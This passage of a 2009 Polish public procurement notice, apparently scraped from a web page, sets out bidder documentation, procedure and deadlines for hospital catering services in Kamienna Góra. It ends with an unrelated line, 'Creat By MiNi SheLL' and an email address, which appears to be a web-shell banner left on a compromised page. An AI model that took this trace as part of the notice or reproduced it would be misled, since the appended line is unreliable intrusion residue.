koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjecie działalności gospodarczej w zakresie objętym zamówieniem publicznym, zwanym dalej zamówieniem - zał nr 5 (W przypadku gdy ustawy nie nakładają obowiązku posiadania koncesji, zezwolenia ani licencji Zamawiający uzna przedstawienie stosownego oświadczenia za wyczerpujące spełnienie zapisów tej kwestii pod tym samym numerem);
w przypadku wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium RP Zamawiający wymaga złożenia dokumentów  o których mowa w  § 2 ust. 1, 2, 3 RPRM z dn. 19 maja 2006r. na zasadach określonych danymi przepisami - zał nr 6.
2.1 W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Zamawiający żąda następujących dokumentów (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę):
 wykazu wykonanych usług   w okresie ostatnich trzech  lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu oraz daty, miejsca  wykonania  i odbiorców  wraz załączeniem dokumentów potwierdzających, że usługi  te zostały wykonane należycie - zał nr  A  - wykazu usług  (Dla Zamawiającego wystarczającym jest udokumentowanie co najmniej 1 usługi  odpowiadającej swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia,  z podaniem ich wartości, dat i miejsca wykonania wykonanych (zakończonych) lub wykonywanych  z ostatnich 3 lat  wraz z dokumentami (referencjami), z których wynikać musi, że usługa ta została wykonana lub jest  wykonywana należycie. Załączenie w ofercie więcej niż 1  udokumentowanej usługi  nie wpłynie na ocenę oferty).
Wykaz niezbędnych o wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca - zał  B 
pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa wyżej wykonawca wskazał narzędzi i urządzenia, którymi będzie dysponował - zał  nr Bb**
wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - zał C
pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa wyżej wykonawca wykazał osoby, którymi będzie dysponował zał nr Cc**

2.W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji
ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda następujących dokumentów:
  -   polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności  
       cywilnej w zakresie prowadzonej działalności  - zał nr C.
3. oświadczenie  Wykonawcy, iż  opracuje wdroży i utrzyma usługi żywienia zbiorowego w systemie  HACCP  - zał nr D***

*   Załącznik wypełnić w  przypadku gdy oferta będzie podpisywana przez pełnomocnika  (nie wyszczególniony w aktualnym KRS lub wpisie do  ewidencji działalności gospodarczej), czy jednego z konsorcjantów podmiotu składającego ofertę. W  przypadku gdy oferta będzie podpisywana przez upełnomocnionego przedstawiciela firmy wyszczególnionego w aktualnym   KRS   lub  aktualnym zaświadczeniu o wpisie do ewidencji działalności gospodarczej dany załącznik nie jest konieczny do wypełnienia i załączenia do oferty. 
** załączniki sporządza  Wykonawca w przypadku gdy w przypadku okoliczności o których mowa w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 mają 2006r. (Dz. U. Nr 87, poz. 605) oraz rozporządzeniu PRM z dnia 16 października 2008r. (Dz. U. Nr 188, poz. 1155). 
*** załącznik sporządza Wykonawca.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE  CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  sp zoo
NIEPUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ SZPITAL POWIATOWY 
58-400 KAMIENNA GÓRA
ul. BOHATERÓW GETTA 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 10:00, miejsce: SEKRETARIAT
POWIATOWE  CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  sp zoo
NIEPUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ SZPITAL POWIATOWY 
58-400 KAMIENNA GÓRA
ul. BOHATERÓW GETTA 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com